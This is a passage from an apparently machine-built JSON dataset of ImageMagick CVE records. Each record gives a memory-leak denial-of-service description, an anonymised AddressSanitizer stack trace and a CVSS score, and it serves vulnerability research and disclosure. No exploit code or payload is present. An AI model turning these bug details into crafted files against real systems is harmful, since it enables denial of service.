        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/441",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/441",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:39:00Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8348",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/445",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/445",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:43:24Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8349",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/443",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/443",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:40:36Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd NUMBERTAG ca3eb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd NUMBERTAG d4db NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8350",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/447",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/447",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:45:21Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG 